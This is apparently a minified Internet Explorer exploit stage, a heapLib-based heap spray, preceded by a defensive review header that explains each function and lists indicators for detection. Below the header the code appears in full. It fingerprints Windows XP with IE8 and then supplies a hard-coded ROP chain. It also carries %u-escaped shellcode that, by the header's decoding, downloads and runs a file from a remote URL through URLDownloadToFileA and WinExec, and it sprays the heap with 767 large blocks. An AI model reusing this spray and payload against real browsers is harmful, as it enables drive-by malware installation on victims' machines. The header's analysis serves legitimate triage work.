// REVIEW NOTES (defensive analysis; the code below is unchanged).
//
// What this is: a minified browser-side exploit stage. It bundles the "heapLib.ie" heap
// helper for Internet Explorer, then sprays the heap with large strings that each carry a
// %u-escaped native payload. The code that actually triggers a memory-corruption bug is not in
// this listing; the final statement only prepares `overflow` for something outside it.
//
// Values read from outside this listing (all undefined here; presumably set by the hosting page):
//   exec_file_url   - string appended to the payload after passing through Url_To_ShellUrl
//   uzuzs           - %u-escaped filler pattern, copied into the implicit global `uzuz`
//   CollectGarbage  - JScript-only global used to force garbage collection
//   navigator       - browser global, used for user-agent fingerprinting
//
// Url_To_ShellUrl(a): appends a NUL, pads to an even length with another NUL, then emits the
//   text "%uYYXX" for each pair of characters (second character's hex first). The result is
//   still escaped text; it is concatenated into the payload string before unescape() runs.
//   Each char code is assumed to fit in two hex digits - larger codes would break the format.
//
// heapLib.ie(maxAlloc, heapBase): defaults are 65535 and 1376256 (0x150000). The constructor
//   doubles paddingStr ("AAAA") until 2*length+6 reaches maxAlloc, then flushes the cache.
//   .debug/.debugHeap/.debugBreak  call Math.atan2/atan/asin/acos with 47806 (0xBABE) and
//                                  discard the result; presumably breakpoint hooks for a
//                                  native debugger - confirm.
//   .padding(n)                    first n characters of paddingStr; throws if n is too large.
//   .round(a, c)                   rounds a up to a multiple of c; throws when c is 0.
//   .hex(a, width)                 upper-case hex text, left-padded with "0" to width.
//   .addr(a)                       32-bit value as a 2-character string, low 16 bits first.
//   .allocOleaut32(a, tag)         a is a string or a byte size; the size is computed as
//                                  2*length+6 and must be a multiple of 16. A string copy is
//                                  pushed onto this.mem[tag].
//   .freeOleaut32(tag)             deletes this.mem[tag] and calls CollectGarbage().
//   .flushOleaut32()               frees tag "oleaut32", then allocates 6 blocks each of sizes
//                                  32, 64, 256 and 32768 under that tag.
//   .alloc / .free / .gc           wrappers that refuse the four cache sizes and flush after
//                                  freeing or collecting.
//   .freeList / .lookaside / .lookasideAddr  allocation patterns and an address formula
//                                  (heapBase + 1672 + 48*((size+8)/8)); not called in this listing.
//   .vtable(a, c, b)               not called in this listing. NOTE(review): it calls
//                                  heap.padding(...) on a global `heap`, not this.padding;
//                                  no `heap` is defined here.
//
// Spray driver (after the library):
//   - pre_shell is empty unless the lower-cased user agent contains both "windows nt 5.1" and
//     "msie 8"; in that case it becomes a fixed list of hard-coded 32-bit values (most in the
//     0x77c1xxxx-0x77c5xxxx range, plus 0x0c0c0c04) and off_sub_int changes from 1530 to 1524.
//   - code = unescape(pre_shell + fixed %u payload + Url_To_ShellUrl(exec_file_url)).
//   - nops = unescape(uzuz), doubled until it holds at least 524288 characters.
//   - shellcode = off_sub_int filler chars + code + filler up to 2048 chars, doubled until it
//     holds at least 262144 characters; block is its first 262141 characters, which is
//     524288 bytes by the 2*length+6 formula used above.
//   - heap_obj = new heapLib.ie(131072); gc() runs once, then block is allocated 767 times.
//
// Indicators visible in this text (useful for content inspection and triage):
//   - identifiers heapLib, allocOleaut32, flushOleaut32, CollectGarbage, Url_To_ShellUrl
//   - long runs of %uXXXX passed to unescape(), and string doubling to hundreds of KB
//   - user-agent test for "windows nt 5.1" together with "msie 8"
//   - the %u data decodes (byte-swapped ASCII) to the names GetTempPathA, LoadLibraryA,
//     GetProcAddress, WinExec, ExitProcess, URLMON.DLL, URLDownloadToFileA and WinProcess.exe.
//     That is consistent with a stub that downloads exec_file_url and runs it; the machine
//     code itself was not verified here.
//
// NOTE(review): the physical line breaks below look like wrapping artefacts. Two fall inside
// ternary expressions and one falls inside the `code` string literal, which is not valid
// JavaScript as shown.
function Url_To_ShellUrl(a) { var c = "", b = "", d = "", a = a + String.fromCharCode(0); a.length % 2 && (a += String.fromCharCode(0)); for (var e = 0; e < a.length; e++) b = a.charCodeAt(e).toString(16), d = a.charCodeAt(e + 1).toString(16), 2 > b.length && (b = "0" + b), 2 > d.length && (d = "0" + d), c += "%u" + d + b, e += 1; return c } function heapLib() {} heapLib.ie = function (a, c) { this.maxAlloc = a ? a : 65535; this.heapBase = c ? c : 1376256; for (this.paddingStr = "AAAA"; 2 * this.paddingStr.length + 6 < this.maxAlloc;) this.paddingStr += this.paddingStr; this.mem = []; this.flushOleaut32() }; heapLib.ie.prototype.debug = function (a) { void Math.atan2(47806, a) }; heapLib.ie.prototype.debugHeap = function (a) { !0 == a ? void Math.atan(47806) : void Math.asin(47806) }; heapLib.ie.prototype.debugBreak = function () { void Math.acos(47806) }; heapLib.ie.prototype.padding = function (a) { if (a > this.paddingStr.length) throw "Requested padding string length " + a + ", only " + this.paddingStr.length + " available"; return this.paddingStr.substr(0, a) }; heapLib.ie.prototype.round = function (a, c) { if (0 == c) throw "Round argument cannot be 0"; return parseInt((a + (c - 1)) / c) * c }; heapLib.ie.prototype.hex = function (a, c) { for (var b = "0123456789ABCDEF".substr(a & 15, 1); 15 < a;) a >>>= 4, b = "0123456789ABCDEF".substr(a & 15, 1) + b; for (c = c ? c : 0; b.length < c;) b = "0" + b; return b }; heapLib.ie.prototype.addr = function (a) { return unescape("%u" + this.hex(a & 65535, 4) + "%u" + this.hex(a >> 16 & 65535, 4)) }; heapLib.ie.prototype.allocOleaut32 = function (a, c) { var b; b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a; if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16"; void 0 === this.mem[c] && (this.mem[c] = []); "string" == typeof a || a instanceof String ? 
this.mem[c].push(a.substr(0, a.length)) : this.mem[c].push(this.padding((a - 6) / 2)) }; heapLib.ie.prototype.freeOleaut32 = function (a) { delete this.mem[a]; CollectGarbage() }; heapLib.ie.prototype.flushOleaut32 = function () { this.debug("Flushing the OLEAUT32 cache"); this.freeOleaut32("oleaut32"); for (var a = 0; 6 > a; a++) this.allocOleaut32(32, "oleaut32"), this.allocOleaut32(64, "oleaut32"), this.allocOleaut32(256, "oleaut32"), this.allocOleaut32(32768, "oleaut32") }; heapLib.ie.prototype.alloc = function (a, c) { var b; b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a; if (32 == b || 64 == b || 256 == b || 32768 == b) throw "Allocation sizes " + b + " cannot be flushed out of the OLEAUT32 cache"; this.allocOleaut32(a, c) }; heapLib.ie.prototype.free = function (a) { this.freeOleaut32(a); this.flushOleaut32() }; heapLib.ie.prototype.gc = function () { this.debug("Running the garbage collector"); CollectGarbage(); this.flushOleaut32() }; heapLib.ie.prototype.freeList = function (a, c) { for (var c = c ? c : 1, b = 0; b < c; b++) this.alloc(a), this.alloc(a, "freeList"); this.alloc(a); this.free("freeList") }; heapLib.ie.prototype.lookaside = function (a, c) { var b; b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a; if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16"; if (1024 <= b + 8) throw "Maximum lookaside block size is 1008 bytes"; c = c ? c : 1; for (b = 0; b < c; b++) this.alloc(a, "lookaside"); this.free("lookaside") }; heapLib.ie.prototype.lookasideAddr = function (a) { a = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a; if (0 != (a & 15)) throw "Allocation size " + a + " must be a multiple of 16"; if (1024 <= a + 8) throw "Maximum lookaside block size is 1008 bytes"; return this.heapBase + 1672 + 48 * ((a + 8) / 8) }; heapLib.ie.prototype.vtable = function (a, c, b) { b = b ? 
b : 1008; if (0 != (b & 15)) throw "Vtable size " + b + " must be a multiple of 16"; if (2 * a.length > b - 138) throw "Maximum shellcode length is " + (b - 138) + " bytes"; for (var d = unescape("%u9090%u7ceb"), e = 0; 31 > e; e++) d += this.addr(c); return d += unescape("%u0028%u0028") + a + heap.padding((b - 138) / 2 - a.length) }; var pre_shell = ""; var off_sub_int = 1530; var userAgent_var = navigator.userAgent.toLowerCase(); if ((userAgent_var.indexOf("windows nt 5.1") >= 0) && (userAgent_var.indexOf('msie 8') >= 0)) { pre_shell = "%ue393%u77c4%ue392%u77c4%u5ed5%u77c1%u1891%u77c2%u0c04%u0c0c%ue392%u77c4%u1120%u77c1%ue493%u77c2%u7252%u5954%udd6c%u77c2%uec00%u77c4%u5459%u77c3%u7705%u77c4%u0114%u0000%uea01%u77c3%ud000%u77c5%u6100%u77c4%u6101%u77c4%ud680%u77c4%u0040%u0000%ue392%u77c4%u3c37%ud602%u2df9%u77c1"; off_sub_int = 1524; } uzuz = uzuzs; for (var heap_obj = new heapLib.ie(131072), code = unescape(pre_shell + "%uc481%uf254%uffff%u00E8%u0000%u5D00%uED83%u3105%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u0846%u7E8B%u8B20%u6636%u4F39%u7518%uBEF2%u00D2%u0000%uEE01%uBEBF%u0000%u0100%uE8EF%u0163%u0000%uEA89%uC281%u00D2%u0000%u6852%u0080%u0000%u95FF%u00BE%u0000%uEA89%uC281%u00D2%u0000%uF631%uC201%u9C8A%uE335%u0001%u8000%u00FB%u0674%u1C88%u4632%uEEEB%u04C6%u0032%uEA89%uC281%u01C5%u0000%uFF52%uC295%u0000%u8900%u81EA%uD0C2%u0001%u5200%uFF50%uC695%u0000%u6A00%u6A00%u8900%u81EA%uD2C2%u0000%u5200%uEA89%uC281%u01F2%u0000%u6A52%uFF00%u6AD0%u8905%u81EA%uD2C2%u0000%u5200%u95FF%u00CA%u0000%u006A%u95FF%u00CE%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6D65%u5070%u7461%u4168%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u6547%u5074%u6F72%u4163%u6464%u6572%u7373%u5700%u6E69%u7845%u6365%u4500%u6978%u5074%u6F72%u6563%u7373%uBB00%uF289%uF789%uC030%u75AE%u29FD%u89F7%u31F9%uBEC0%u003C%u0000%uB503%u019B%u0000%uAD66%u8503%u019B%u0000%u708B%u8378%u1CC6%uB503%u019B%u0000%uBD8D%u019F%u0000%u03AD%u9B85%u0001%uAB00%u03AD%u9B85%u0001%u5000%uADAB%u8503%u019B%u0000%u5EA
B%uDB31%u56AD%u8503%u019B%u0000%uC689%uD789%uFC51%uA6F3%u7459%u5E04%uEB43%u5EE9%uD193%u03E0%uA785%u0001%u3100%u96F6%uAD66%uE0C1%u0302%u9F85%u0001%u8900%uADC6%u8503%u019B%u0000%uEBC3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u9B85%u0001%u5600%uE857%uFF58%uFFFF%u5E5F%u01AB%u80CE%uBB3E%u0274%uEDEB%u55C3%u4C52%u4F4D%u2E4E%u4C44%u004C%u5255%u444C%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%u5700%u6E69%u7250%u636F%u7365%u2E73%u7865%u0065" + Url_To_ShellUrl(exec_file_url)), nops = unescape(uzuz); 524288 > nops.length;) nops += nops; for (var offset = nops.substring(0, off_sub_int), shellcode = offset + code + nops.substring(0, 2048 - code.length - offset.length); 262144 > shellcode.length;) shellcode += shellcode; var block = shellcode.substring(0, 262141); heap_obj.gc(); for (var i = 1; 768 > i; i++) heap_obj.alloc(block); var overflow = nops.substring(0, 10);